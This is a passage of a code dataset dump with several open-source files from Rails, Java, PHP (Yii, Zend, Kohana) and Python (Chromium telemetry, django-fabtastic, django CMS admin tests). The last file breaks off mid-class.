code stringlengths 3 1.05M | repo_name stringlengths 4 116 | path stringlengths 4 991 | language stringclasses 9 values | license stringclasses 15 values | size int32 3 1.05M |
|---|---|---|---|---|---|
module SpreeSuppliers
module Generators
class InstallGenerator < Rails::Generators::Base
include Rails::Generators::Migration
def add_javascripts
append_file "app/assets/javascripts/store/all.js", "//= require store/spree_suppliers\n"
append_file "app/assets/javascripts/admin/all.js", "//= require admin/spree_suppliers\n"
end
def add_stylesheets
inject_into_file "app/assets/stylesheets/store/all.css", " *= require store/spree_suppliers\n", :before => /\*\//, :verbose => true
inject_into_file "app/assets/stylesheets/admin/all.css", " *= require admin/spree_suppliers\n", :before => /\*\//, :verbose => true
end
def add_migrations
run 'bundle exec rake railties:install:migrations FROM=spree_suppliers'
end
def run_migrations
res = ask "Would you like to run the migrations now? [Y/n]"
if res == "" || res.downcase == "y"
run 'bundle exec rake db:migrate'
else
puts "Skiping rake db:migrate, don't forget to run it!"
end
end
end
end
end
| johndavid400/spree_suppliers | lib/generators/spree_suppliers/install/install_generator.rb | Ruby | bsd-3-clause | 1,110 |
/*
Copyright (c) 2016, Technikradio
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Node2 nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/**
*
*/
package org.technikradio.node.tests.engine;
import static org.junit.Assert.*;
import javax.swing.JPanel;
import org.junit.Before;
import org.junit.Test;
import org.technikradio.node.engine.plugin.settings.SettingsPage;
/**
* This is the test case for the settings page class
* @author doralitze
*
*/
public class SettingsPageTest {
private SettingsPage sp;
private JPanel jp;
/**
* @throws java.lang.Exception In case of an exception
*/
@Before
public void setUp() throws Exception {
sp = new SettingsPage("org.technikradio.node.tests.samplesettingspage");
jp = new JPanel();
sp.setPanel(jp);
}
/**
* Test method for {@link org.technikradio.node.engine.plugin.settings.SettingsPage#getPanel()}.
*/
@Test
public final void testGetPanel() {
assertEquals(jp, sp.getPanel());
}
}
| Technikradio/Node2 | src/tests/org/technikradio/node/tests/engine/SettingsPageTest.java | Java | bsd-3-clause | 2,311 |
/*******************************************************************************
* Copyright SemanticBits, Northwestern University and Akaza Research
*
* Distributed under the OSI-approved BSD 3-Clause License.
* See http://ncip.github.com/caaers/LICENSE.txt for details.
******************************************************************************/
package gov.nih.nci.cabig.caaers.validation;
import java.util.ArrayList;
import java.util.List;
import org.apache.commons.lang.StringUtils;
public class ValidationErrors {
List<ValidationError> errors;
public ValidationErrors() {
errors = new ArrayList<ValidationError>();
}
public ValidationError addValidationError(String code, String msg, Object... r1) {
ValidationError ve = new ValidationError(code, msg, r1);
errors.add(ve);
return ve;
}
public void addValidationErrors(List<ValidationError> errorList){
for(ValidationError e : errorList) errors.add(e);
}
public String toString() {
return errors.toString();
}
public int getErrorCount() {
return errors.size();
}
public boolean hasErrors() {
return errors.size() > 0;
}
public List<ValidationError> getErrors() {
return errors;
}
public ValidationError getErrorAt(int index) {
return errors.get(index);
}
public boolean containsErrorWithCode(String code){
for(ValidationError error : errors){
if(StringUtils.equals(error.getCode(),code)) return true;
}
return false;
}
}
| NCIP/caaers | caAERS/software/core/src/main/java/gov/nih/nci/cabig/caaers/validation/ValidationErrors.java | Java | bsd-3-clause | 1,634 |
<?php
namespace common\models;
use Yii;
use yii\base\Model;
use yii\data\ActiveDataProvider;
use common\models\Fund;
/**
* FundSearch represents the model behind the search form about `common\models\Fund`.
*/
class FundSearch extends Fund
{
/**
* @inheritdoc
*/
public function rules()
{
return [
[['id', 'created_at', 'updated_at'], 'integer'],
[['name', 'num', 'date', 'week', 'month', 'quarter', 'year', 'three_year', 'all'], 'safe'],
];
}
/**
* @inheritdoc
*/
public function scenarios()
{
// bypass scenarios() implementation in the parent class
return Model::scenarios();
}
/**
* Creates data provider instance with search query applied
*
* @param array $params
*
* @return ActiveDataProvider
*/
public function search($params)
{
$query = Fund::find();
$dataProvider = new ActiveDataProvider([
'query' => $query,
'pagination' => ['pageSize' => 20],
]);
$this->load($params);
if (!$this->validate()) {
// uncomment the following line if you do not want to return any records when validation fails
// $query->where('0=1');
return $dataProvider;
}
$query->andFilterWhere([
'id' => $this->id,
'created_at' => $this->created_at,
'updated_at' => $this->updated_at,
]);
$query->andFilterWhere(['like', 'name', $this->name])
->andFilterWhere(['like', 'num', $this->num])
->andFilterWhere(['like', 'date', $this->date])
->andFilterWhere(['like', 'week', $this->week])
->andFilterWhere(['like', 'month', $this->month])
->andFilterWhere(['like', 'quarter', $this->quarter])
->andFilterWhere(['like', 'year', $this->year])
->andFilterWhere(['like', 'three_year', $this->three_year])
->andFilterWhere(['like', 'all', $this->all]);
return $dataProvider;
}
}
| specialnote/myYii | common/models/FundSearch.php | PHP | bsd-3-clause | 2,090 |
<?php
namespace backend\controllers\settings;
use Yii;
use yii\filters\AccessControl;
use yii\web\Controller;
use yii\filters\VerbFilter;
use backend\models\settings\Details;
use yii\web\User;
/**
* Site controller
*/
class DetailsController extends Controller
{
/**
* @inheritdoc
*/
public function behaviors()
{
return [
'access' => [
'class' => AccessControl::className(),
'rules' => [
[
'actions' => ['login', 'error'],
'allow' => true,
],
[
'actions' => ['index'],
'allow' => true,
'roles' => ['@'],
'matchCallback' => function ($rule, $action) {
return (Yii::$app->user->identity->access > 50)? true : false;
}
],
],
],
'verbs' => [
'class' => VerbFilter::className(),
'actions' => [
'logout' => ['post'],
],
],
];
}
/**
* @inheritdoc
*/
public function actions()
{
return [
'error' => [
'class' => 'yii\web\ErrorAction',
],
];
}
public function actionIndex()
{
$model = Details::findOne(1);
if($model->load(Yii::$app->request->post()) && $model->validate()){
$model->save();
Yii::$app->getSession()->setFlash('success', 'Изменения сохранены');
return $this->redirect(['/settings/details/index']);
}
return $this->render('form',[
'model' => $model,
'action' => 'update',
]);
}
}
| ocrm/crm | backend/controllers/settings/DetailsController.php | PHP | bsd-3-clause | 1,893 |
<?php defined('SYSPATH') OR die('No direct access allowed.');
class Jam_Behavior_Promotable_Purchase extends Kohana_Jam_Behavior_Promotable_Purchase {}
| OpenBuildings/promotions | classes/Jam/Behavior/Promotable/Purchase.php | PHP | bsd-3-clause | 153 |
# Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Finds browsers that can be controlled by telemetry."""
import logging
from telemetry import decorators
from telemetry.internal.backends.chrome import android_browser_finder
from telemetry.internal.backends.chrome import cros_browser_finder
from telemetry.internal.backends.chrome import desktop_browser_finder
from telemetry.internal.browser import browser_finder_exceptions
from telemetry.internal.platform import device_finder
BROWSER_FINDERS = [
desktop_browser_finder,
android_browser_finder,
cros_browser_finder,
]
def FindAllBrowserTypes(options):
browsers = []
for bf in BROWSER_FINDERS:
browsers.extend(bf.FindAllBrowserTypes(options))
return browsers
@decorators.Cache
def FindBrowser(options):
"""Finds the best PossibleBrowser object given a BrowserOptions object.
Args:
A BrowserOptions object.
Returns:
A PossibleBrowser object.
Raises:
BrowserFinderException: Options improperly set, or an error occurred.
"""
if options.__class__.__name__ == '_FakeBrowserFinderOptions':
return options.fake_possible_browser
if options.browser_type == 'exact' and options.browser_executable == None:
raise browser_finder_exceptions.BrowserFinderException(
'--browser=exact requires --browser-executable to be set.')
if options.browser_type != 'exact' and options.browser_executable != None:
raise browser_finder_exceptions.BrowserFinderException(
'--browser-executable requires --browser=exact.')
if options.browser_type == 'cros-chrome' and options.cros_remote == None:
raise browser_finder_exceptions.BrowserFinderException(
'browser_type=cros-chrome requires cros_remote be set.')
if (options.browser_type != 'cros-chrome' and
options.browser_type != 'cros-chrome-guest' and
options.cros_remote != None):
raise browser_finder_exceptions.BrowserFinderException(
'--remote requires --browser=cros-chrome or cros-chrome-guest.')
devices = device_finder.GetDevicesMatchingOptions(options)
browsers = []
default_browsers = []
for device in devices:
for finder in BROWSER_FINDERS:
if(options.browser_type and options.browser_type != 'any' and
options.browser_type not in finder.FindAllBrowserTypes(options)):
continue
curr_browsers = finder.FindAllAvailableBrowsers(options, device)
new_default_browser = finder.SelectDefaultBrowser(curr_browsers)
if new_default_browser:
default_browsers.append(new_default_browser)
browsers.extend(curr_browsers)
if options.browser_type == None:
if default_browsers:
default_browser = sorted(default_browsers,
key=lambda b: b.last_modification_time())[-1]
logging.warning('--browser omitted. Using most recent local build: %s',
default_browser.browser_type)
default_browser.UpdateExecutableIfNeeded()
return default_browser
if len(browsers) == 1:
logging.warning('--browser omitted. Using only available browser: %s',
browsers[0].browser_type)
browsers[0].UpdateExecutableIfNeeded()
return browsers[0]
raise browser_finder_exceptions.BrowserTypeRequiredException(
'--browser must be specified. Available browsers:\n%s' %
'\n'.join(sorted(set([b.browser_type for b in browsers]))))
if options.browser_type == 'any':
types = FindAllBrowserTypes(options)
def CompareBrowsersOnTypePriority(x, y):
x_idx = types.index(x.browser_type)
y_idx = types.index(y.browser_type)
return x_idx - y_idx
browsers.sort(CompareBrowsersOnTypePriority)
if len(browsers) >= 1:
browsers[0].UpdateExecutableIfNeeded()
return browsers[0]
else:
return None
matching_browsers = [
b for b in browsers
if b.browser_type == options.browser_type and
b.SupportsOptions(options.browser_options)]
chosen_browser = None
if len(matching_browsers) == 1:
chosen_browser = matching_browsers[0]
elif len(matching_browsers) > 1:
logging.warning('Multiple browsers of the same type found: %s',
repr(matching_browsers))
chosen_browser = sorted(matching_browsers,
key=lambda b: b.last_modification_time())[-1]
if chosen_browser:
logging.info('Chose browser: %s', repr(chosen_browser))
chosen_browser.UpdateExecutableIfNeeded()
return chosen_browser
@decorators.Cache
def GetAllAvailableBrowsers(options, device):
"""Returns a list of available browsers on the device.
Args:
options: A BrowserOptions object.
device: The target device, which can be None.
Returns:
A list of browser instances.
Raises:
BrowserFinderException: Options are improperly set, or an error occurred.
"""
if not device:
return []
possible_browsers = []
for browser_finder in BROWSER_FINDERS:
possible_browsers.extend(
browser_finder.FindAllAvailableBrowsers(options, device))
return possible_browsers
@decorators.Cache
def GetAllAvailableBrowserTypes(options):
"""Returns a list of available browser types.
Args:
options: A BrowserOptions object.
Returns:
A list of browser type strings.
Raises:
BrowserFinderException: Options are improperly set, or an error occurred.
"""
devices = device_finder.GetDevicesMatchingOptions(options)
possible_browsers = []
for device in devices:
possible_browsers.extend(GetAllAvailableBrowsers(options, device))
type_list = set([browser.browser_type for browser in possible_browsers])
# The reference build should be available for mac, linux and win, but the
# desktop browser finder won't return it in the list of browsers.
for browser in possible_browsers:
if (browser.target_os == 'darwin' or browser.target_os.startswith('linux')
or browser.target_os.startswith('win')):
type_list.add('reference')
break
type_list = list(type_list)
type_list.sort()
return type_list
| catapult-project/catapult-csm | telemetry/telemetry/internal/browser/browser_finder.py | Python | bsd-3-clause | 6,167 |
<?php
// module/SousRubrique/src/SousRubrique/Form/SousRubriqueForm.php:
namespace Galerie\Form;
use Zend\Form\Form;
use Zend\Form\Element;
use Rubrique\Model\RubriqueDao;
use Contenu\Form\ContenuForm;
/**
* Class GalerieForm
* @package Galerie\Form
*/
class GalerieForm extends ContenuForm {
/**
* @return array
*/
protected function getRubriques() {
$rubriquesDao = new RubriqueDao();
$rubriques = $rubriquesDao->getAllRubriques("array");
$rubriqueArray = array();
foreach ($rubriques as $value) {
$rubriqueArray[$value['id']] = $value['libelle'];
}
return $rubriqueArray;
}
/*
protected function getSousRubriques($rubid){
$sousrubriquesDao= new SousRubriqueDao();
$sousrubriques = $sousrubriquesDao->getSousrubriquesByRubrique($rubid,"array");
$sousrubriqueArray = array();
foreach($sousrubriques as $value){
$sousrubriqueArray[$value['id']]=$value['libelle'];
}
return $sousrubriqueArray;
}
*/
/**
* GalerieForm constructor.
* @param null $name
*/
public function __construct($name = null) {
// we want to ignore the name passed
parent::__construct('galerieform');
//$this->setHydrator(new ClassMethods);
$this->add(array(
'name' => 'imagepath',
'attributes' => array(
'type' => 'text'
),
'options' => array(
'label' => $this->utils->translate('Image')
),
));
$this->add(array(
'name' => 'imagepath2',
'attributes' => array(
'type' => 'text'
),
'options' => array(
'label' => $this->utils->translate('Image 2')
),
));
}
}
| rongeb/anit_cms_for_zf3 | module/Galerie/src/Form/GalerieForm.php | PHP | bsd-3-clause | 1,872 |
import os
from django.core.management.base import BaseCommand
from django.conf import settings
from fabtastic import db
class Command(BaseCommand):
args = '[<output_file_path>]'
help = 'Dumps a SQL backup of your entire DB. Defaults to CWD.'
def get_dump_path(self, db_alias):
"""
Determines the path to write the SQL dump to. Depends on whether the
user specified a path or not.
"""
if len(self.args) > 0:
return self.args[0]
else:
dump_filename = db.util.get_db_dump_filename(db_alias=db_alias)
return os.path.join(os.getcwd(), dump_filename)
def handle(self, *args, **options):
"""
Handle raw input.
"""
self.args = args
self.options = options
db_alias = getattr(settings, 'FABTASTIC_DIRECT_TO_DB_ALIAS', 'default')
# Get DB settings from settings.py.
database = db.util.get_db_setting_dict(db_alias=db_alias)
# Figure out where to dump the file to.
dump_path = self.get_dump_path(db_alias)
# Run the db dump.
db.dump_db_to_file(dump_path, database) | duointeractive/django-fabtastic | fabtastic/management/commands/ft_dump_db.py | Python | bsd-3-clause | 1,185 |
# -*- coding: utf-8 -*-
import json
import datetime
from djangocms_text_ckeditor.cms_plugins import TextPlugin
from djangocms_text_ckeditor.models import Text
from django.contrib import admin
from django.contrib.admin.models import LogEntry
from django.contrib.admin.sites import site
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission, AnonymousUser
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.http import (Http404, HttpResponseBadRequest,
QueryDict, HttpResponseNotFound)
from django.utils.encoding import force_text, smart_str
from django.utils import timezone
from django.utils.six.moves.urllib.parse import urlparse
from cms import api
from cms.api import create_page, create_title, add_plugin, publish_page
from cms.admin.change_list import CMSChangeList
from cms.admin.forms import PageForm, AdvancedSettingsForm
from cms.admin.pageadmin import PageAdmin
from cms.constants import TEMPLATE_INHERITANCE_MAGIC
from cms.models import StaticPlaceholder
from cms.models.pagemodel import Page
from cms.models.permissionmodels import GlobalPagePermission, PagePermission
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.models.titlemodels import Title
from cms.test_utils import testcases as base
from cms.test_utils.testcases import (
CMSTestCase, URL_CMS_PAGE_DELETE, URL_CMS_PAGE,URL_CMS_TRANSLATION_DELETE,
URL_CMS_PAGE_CHANGE_LANGUAGE, URL_CMS_PAGE_CHANGE,
URL_CMS_PAGE_ADD, URL_CMS_PAGE_PUBLISHED
)
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_cms_setting
from cms.utils.compat import DJANGO_1_10
from cms.utils.urlutils import admin_reverse
class AdminTestsBase(CMSTestCase):
@property
def admin_class(self):
return site._registry[Page]
def _get_guys(self, admin_only=False, use_global_permissions=True):
admin_user = self.get_superuser()
if admin_only:
return admin_user
staff_user = self._get_staff_user(use_global_permissions)
return admin_user, staff_user
def _get_staff_user(self, use_global_permissions=True):
USERNAME = 'test'
if get_user_model().USERNAME_FIELD == 'email':
normal_guy = get_user_model().objects.create_user(USERNAME, 'test@test.com', 'test@test.com')
else:
normal_guy = get_user_model().objects.create_user(USERNAME, 'test@test.com', USERNAME)
normal_guy.is_staff = True
normal_guy.is_active = True
normal_guy.save()
normal_guy.user_permissions = Permission.objects.filter(
codename__in=['change_page', 'change_title', 'add_page', 'add_title', 'delete_page', 'delete_title']
)
if use_global_permissions:
gpp = GlobalPagePermission.objects.create(
user=normal_guy,
can_change=True,
can_delete=True,
can_change_advanced_settings=False,
can_publish=True,
can_change_permissions=False,
can_move_page=True,
)
gpp.sites = Site.objects.all()
return normal_guy
class AdminTestCase(AdminTestsBase):
def test_extension_not_in_admin(self):
admin_user, staff = self._get_guys()
with self.login_user_context(admin_user):
request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en',)
response = site.index(request)
self.assertNotContains(response, '/mytitleextension/')
self.assertNotContains(response, '/mypageextension/')
def test_2apphooks_with_same_namespace(self):
PAGE1 = 'Test Page'
PAGE2 = 'Test page 2'
APPLICATION_URLS = 'project.sampleapp.urls'
admin_user, normal_guy = self._get_guys()
current_site = Site.objects.get(pk=1)
# The admin creates the page
page = create_page(PAGE1, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page2 = create_page(PAGE2, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page.application_urls = APPLICATION_URLS
page.application_namespace = "space1"
page.save()
page2.application_urls = APPLICATION_URLS
page2.save()
# The admin edits the page (change the page name for ex.)
page_data = {
'title': PAGE2,
'slug': page2.get_slug(),
'language': 'en',
'site': page.site.pk,
'template': page2.template,
'application_urls': 'SampleApp',
'application_namespace': 'space1',
}
with self.login_user_context(admin_user):
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page.pk, page_data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(Page.objects.filter(application_namespace="space1").count(), 1)
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
self.assertEqual(resp.status_code, 200)
page_data['application_namespace'] = 'space2'
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
self.assertEqual(resp.status_code, 302)
def test_delete(self):
admin_user = self.get_superuser()
create_page("home", "nav_playground.html", "en",
created_by=admin_user, published=True)
page = create_page("delete-page", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_page('child-page', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=page)
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
page.publish('en')
with self.login_user_context(admin_user):
data = {'post': 'yes'}
response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
self.assertRedirects(response, URL_CMS_PAGE)
def test_delete_diff_language(self):
admin_user = self.get_superuser()
create_page("home", "nav_playground.html", "en",
created_by=admin_user, published=True)
page = create_page("delete-page", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_page('child-page', "nav_playground.html", "de",
created_by=admin_user, published=True, parent=page)
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
page.publish('en')
with self.login_user_context(admin_user):
data = {'post': 'yes'}
response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
self.assertRedirects(response, URL_CMS_PAGE)
def test_search_fields(self):
superuser = self.get_superuser()
from django.contrib.admin import site
with self.login_user_context(superuser):
for model, admin_instance in site._registry.items():
if model._meta.app_label != 'cms':
continue
if not admin_instance.search_fields:
continue
url = admin_reverse('cms_%s_changelist' % model._meta.model_name)
response = self.client.get('%s?q=1' % url)
errmsg = response.content
self.assertEqual(response.status_code, 200, errmsg)
def test_pagetree_filtered(self):
superuser = self.get_superuser()
create_page("root-page", "nav_playground.html", "en",
created_by=superuser, published=True)
with self.login_user_context(superuser):
url = admin_reverse('cms_page_changelist')
response = self.client.get('%s?template__exact=nav_playground.html' % url)
errmsg = response.content
self.assertEqual(response.status_code, 200, errmsg)
def test_delete_translation(self):
admin_user = self.get_superuser()
page = create_page("delete-page-translation", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_title("de", "delete-page-translation-2", page, slug="delete-page-translation-2")
create_title("es-mx", "delete-page-translation-es", page, slug="delete-page-translation-es")
with self.login_user_context(admin_user):
response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
self.assertEqual(response.status_code, 200)
response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
self.assertRedirects(response, URL_CMS_PAGE)
response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
self.assertEqual(response.status_code, 200)
response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
self.assertRedirects(response, URL_CMS_PAGE)
def test_change_dates(self):
admin_user, staff = self._get_guys()
with self.settings(USE_TZ=False, TIME_ZONE='UTC'):
page = create_page('test-page', 'nav_playground.html', 'en')
page.publish('en')
draft = page.get_draft_object()
original_date = draft.publication_date
original_end_date = draft.publication_end_date
new_date = timezone.now() - datetime.timedelta(days=1)
new_end_date = timezone.now() + datetime.timedelta(days=1)
url = admin_reverse('cms_page_dates', args=(draft.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {
'language': 'en',
'site': draft.site.pk,
'publication_date_0': new_date.date(),
'publication_date_1': new_date.strftime("%H:%M:%S"),
'publication_end_date_0': new_end_date.date(),
'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
})
self.assertEqual(response.status_code, 302)
draft = Page.objects.get(pk=draft.pk)
self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
self.assertEqual(draft.publication_date.timetuple(), new_date.timetuple())
self.assertEqual(draft.publication_end_date.timetuple(), new_end_date.timetuple())
if original_end_date:
self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
with self.settings(USE_TZ=True, TIME_ZONE='UTC'):
page = create_page('test-page-2', 'nav_playground.html', 'en')
page.publish('en')
draft = page.get_draft_object()
original_date = draft.publication_date
original_end_date = draft.publication_end_date
new_date = timezone.localtime(timezone.now()) - datetime.timedelta(days=1)
new_end_date = timezone.localtime(timezone.now()) + datetime.timedelta(days=1)
url = admin_reverse('cms_page_dates', args=(draft.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {
'language': 'en',
'site': draft.site.pk,
'publication_date_0': new_date.date(),
'publication_date_1': new_date.strftime("%H:%M:%S"),
'publication_end_date_0': new_end_date.date(),
'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
})
self.assertEqual(response.status_code, 302)
draft = Page.objects.get(pk=draft.pk)
self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
self.assertEqual(timezone.localtime(draft.publication_date).timetuple(), new_date.timetuple())
self.assertEqual(timezone.localtime(draft.publication_end_date).timetuple(), new_end_date.timetuple())
if original_end_date:
self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
def test_change_template(self):
admin_user, staff = self._get_guys()
request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en')
request.method = "POST"
pageadmin = site._registry[Page]
with self.login_user_context(staff):
self.assertRaises(Http404, pageadmin.change_template, request, 1)
page = create_page('test-page', 'nav_playground.html', 'en')
response = pageadmin.change_template(request, page.pk)
self.assertEqual(response.status_code, 403)
url = admin_reverse('cms_page_change_template', args=(page.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {'template': 'doesntexist'})
self.assertEqual(response.status_code, 400)
response = self.client.post(url, {'template': get_cms_setting('TEMPLATES')[0][0]})
self.assertEqual(response.status_code, 200)
def test_changelist_items(self):
admin_user = self.get_superuser()
first_level_page = create_page('level1', 'nav_playground.html', 'en')
second_level_page_top = create_page('level21', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=first_level_page)
second_level_page_bottom = create_page('level22', "nav_playground.html", "en",
created_by=admin_user, published=True,
parent=self.reload(first_level_page))
third_level_page = create_page('level3', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=second_level_page_top)
self.assertEqual(Page.objects.all().count(), 4)
url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
request = self.get_request(url)
request.session = {}
request.user = admin_user
page_admin = site._registry[Page]
cl_params = [request, page_admin.model, page_admin.list_display,
page_admin.list_display_links, page_admin.list_filter,
page_admin.date_hierarchy, page_admin.search_fields,
page_admin.list_select_related, page_admin.list_per_page]
if hasattr(page_admin, 'list_max_show_all'): # django 1.4
cl_params.append(page_admin.list_max_show_all)
cl_params.extend([page_admin.list_editable, page_admin])
cl = CMSChangeList(*tuple(cl_params))
root_page = cl.items[0]
self.assertEqual(root_page, first_level_page)
self.assertEqual(root_page.get_children()[0], second_level_page_top)
self.assertEqual(root_page.get_children()[1], second_level_page_bottom)
self.assertEqual(root_page.get_children()[0].get_children()[0], third_level_page)
def test_changelist_get_results(self):
admin_user = self.get_superuser()
first_level_page = create_page('level1', 'nav_playground.html', 'en', published=True)
second_level_page_top = create_page('level21', "nav_playground.html", "en",
created_by=admin_user, published=True,
parent=first_level_page)
second_level_page_bottom = create_page('level22', "nav_playground.html", "en", # nopyflakes
created_by=admin_user, published=True,
parent=self.reload(first_level_page))
third_level_page = create_page('level3', "nav_playground.html", "en", # nopyflakes
created_by=admin_user, published=True,
parent=second_level_page_top)
fourth_level_page = create_page('level23', "nav_playground.html", "en", # nopyflakes
created_by=admin_user,
parent=self.reload(first_level_page))
self.assertEqual(Page.objects.all().count(), 9)
url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
request = self.get_request(url)
request.session = {}
request.user = admin_user
page_admin = site._registry[Page]
# full blown page list. only draft pages are taken into account
cl_params = [request, page_admin.model, page_admin.list_display,
page_admin.list_display_links, page_admin.list_filter,
page_admin.date_hierarchy, page_admin.search_fields,
page_admin.list_select_related, page_admin.list_per_page]
if hasattr(page_admin, 'list_max_show_all'): # django 1.4
cl_params.append(page_admin.list_max_show_all)
cl_params.extend([page_admin.list_editable, page_admin])
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 5)
# only one unpublished page is returned
request = self.get_request(url+'?q=level23')
request.session = {}
request.user = admin_user
cl_params[0] = request
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 1)
# a number of pages matches the query
request = self.get_request(url+'?q=level2')
request.session = {}
request.user = admin_user
cl_params[0] = request
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 3)
def test_unihandecode_doesnt_break_404_in_admin(self):
self.get_superuser()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='admin@django-cms.org', password='admin@django-cms.org')
else:
self.client.login(username='admin', password='admin')
response = self.client.get(URL_CMS_PAGE_CHANGE_LANGUAGE % (1, 'en'))
# Since Django 1.11 404 results in redirect to the admin home
if DJANGO_1_10:
self.assertEqual(response.status_code, 404)
else:
self.assertRedirects(response, reverse('admin:index'))
def test_empty_placeholder_with_nested_plugins(self):
# It's important that this test clears a placeholder
# which only has nested plugins.
# This allows us to catch a strange bug that happened
# under these conditions with the new related name handling.
page_en = create_page("EmptyPlaceholderTestPage (EN)", "nav_playground.html", "en")
ph = page_en.placeholders.get(slot="body")
column_wrapper = add_plugin(ph, "MultiColumnPlugin", "en")
add_plugin(ph, "ColumnPlugin", "en", parent=column_wrapper)
add_plugin(ph, "ColumnPlugin", "en", parent=column_wrapper)
# before cleaning the de placeholder
self.assertEqual(ph.get_plugins('en').count(), 3)
admin_user, staff = self._get_guys()
endpoint = self.get_clear_placeholder_url(ph, language='en')
with self.login_user_context(admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
# After cleaning the de placeholder, en placeholder must still have all the plugins
self.assertEqual(ph.get_plugins('en').count(), 0)
def test_empty_placeholder_in_correct_language(self):
"""
Test that Cleaning a placeholder only affect current language contents
"""
# create some objects
page_en = create_page("EmptyPlaceholderTestPage (EN)", "nav_playground.html", "en")
ph = page_en.placeholders.get(slot="body")
# add the text plugin to the en version of the page
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 1")
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 2")
# creating a de title of the page and adding plugins to it
create_title("de", page_en.get_title(), page_en, slug=page_en.get_slug())
add_plugin(ph, "TextPlugin", "de", body="Hello World DE")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 2")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 3")
# before cleaning the de placeholder
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 3)
admin_user, staff = self._get_guys()
endpoint = self.get_clear_placeholder_url(ph, language='de')
with self.login_user_context(admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
# After cleaning the de placeholder, en placeholder must still have all the plugins
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 0)
class AdminTests(AdminTestsBase):
# TODO: needs tests for actual permissions, not only superuser/normaluser
def setUp(self):
self.page = create_page("testpage", "nav_playground.html", "en")
def get_admin(self):
User = get_user_model()
fields = dict(email="admin@django-cms.org", is_staff=True, is_superuser=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "admin"
usr = User(**fields)
usr.set_password(getattr(usr, User.USERNAME_FIELD))
usr.save()
return usr
